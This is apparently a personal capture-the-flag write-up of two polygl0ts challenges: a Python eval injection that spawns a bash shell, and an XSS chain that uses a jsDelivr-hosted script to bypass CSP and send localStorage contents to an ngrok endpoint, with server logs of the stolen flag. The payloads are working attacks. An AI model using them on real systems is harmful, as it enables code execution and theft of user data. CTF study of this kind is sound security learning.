polygl0ts friday meetings

Spent some time solving polygl0ts friday meetings challenges for fun, might as well do some rough notes/ writeups.

https://friday.polygl0ts.ch/challenges

21/2/2026

Math Game

You see the eval in the code which means that you can run arbiturary code

hacker@HackerbookAce:~/Stuff/polygl0ts/friday$ nc chall.polygl0ts.ch 12003
Welcome to our math game!
Since you're at EPFL, you're probably good at math, right?
Let's see how good you are!
Give me an equation that equals 52
exec("import os; os.system('bash')")
whoami
ubuntu
ls
chal
flag.txt
run
cat flag.txt
friday{whats_1_plus_1_anyway???}

cdn

TLDR
XSS using CDN and exfiltrate to custom endpoint

XSS Payload in search box

<iframe srcdoc="<script src=https://cdn.jsdelivr.net/gh/Hackin7/Programming-Crappy-Solutions@master/cdn_exploit_5.js></script>"></iframe>

JS CDN Payload

var flag = localStorage.getItem('flag');
var loc = JSON.stringify(window.location);
document.location = '/report?url=http://0.tcp.eu.ngrok.io:10105/?today='+Date.now()+'_flag=' + encodeURIComponent(flag) + '_loc_=' + loc;
// for polygl0ts friday meetings


const items = { ...localStorage };
console.log(flag);
console.log(items);
console.log(Date.now());

Steps for Exploitation

  1. Upload something to Github repo
  2. Call from report endpoint
    1. https://cdn-dc0k4gw8wcscgs0k84ckcg44.polygl0ts.manaf.ch/report?url=http://localhost:9007/?search=<iframe srcdoc%3D"<script src%3Dhttps%3A%2F%2Fcdn.jsdelivr.net%2Fgh%2FHackin7%2FProgramming-Crappy-Solutions%40master%2Fcdn_exploit_5.js><%2Fscript>"><%2Fiframe>

Exploit Chain

  1. Report Endpoint
    1. Accesses localhost:9007
    2. Stores flag in website
    3. Accesses desired endpoint
  2. Get Report to Call XSS Payload
    1. The call HAS to be to localhost:9007 to allow the payload to access localstorage based on that hostname
    2. Using the public url won't transfer the localstorage
  3. XSS Payload
    1. Can be injected by URL through the search parameter
    2. Get it to call a script from CDN
      1. Has to be CDN due to the Content Security policy - CDN allows it to be user controlled
      2. Can use this to host github files on CDN https://www.jsdelivr.com/github
      3. Remove spaces from path to prevent execution errors
    3. Cursor suggested using iframe and srcdoc
  4. CDN Script
    1. Use document.location to redirect to the /report endpoint
    2. Can redirect to / to bypass CSP -> using self
      1. public url wont work
  5. /report endpoint accesses custom endpoint
  6. Ngrok + tcp for custom endpoint
::1 - - [21/Feb/2026 14:28:29] code 404, message File not found
::1 - - [21/Feb/2026 14:28:29] "GET /favicon.ico HTTP/1.1" 404 -
::1 - - [21/Feb/2026 14:29:20] "GET /?today=1771655359604_flag=flag{fake_flag}_loc_={%22ancestorOrigins%22:{%220%22:%22http://localhost:9007%22},%22href%22:%22about:srcdoc%22,%22origin%22:%22null%22,%22protocol%22:%22about:%22,%22host%22:%22%22,%22hostname%22:%22%22,%22port%22:%22%22,%22pathname%22:%22srcdoc%22,%22search%22:%22%22,%22hash%22:%22%22} HTTP/1.1" 200 -
::1 - - [21/Feb/2026 14:29:20] code 404, message File not found
::1 - - [21/Feb/2026 14:29:20] "GET /favicon.ico HTTP/1.1" 404 -
::1 - - [21/Feb/2026 14:29:35] "GET /?today=1771655375176_flag=friday{shit_im_way_too_late_16:35}_loc_={%22ancestorOrigins%22:{%220%22:%22http://localhost:9007%22},%22href%22:%22about:srcdoc%22,%22origin%22:%22null%22,%22protocol%22:%22about:%22,%22host%22:%22%22,%22hostname%22:%22%22,%22port%22:%22%22,%22pathname%22:%22srcdoc%22,%22search%22:%22%22,%22hash%22:%22%22} HTTP/1.1" 200 -
::1 - - [21/Feb/2026 14:29:36] code 404, message File not found
::1 - - [21/Feb/2026 14:29:36] "GET /favicon.ico HTTP/1.1" 404 -

Pasted image 20260221164026.png|300

Pasted image 20260221142957.png|400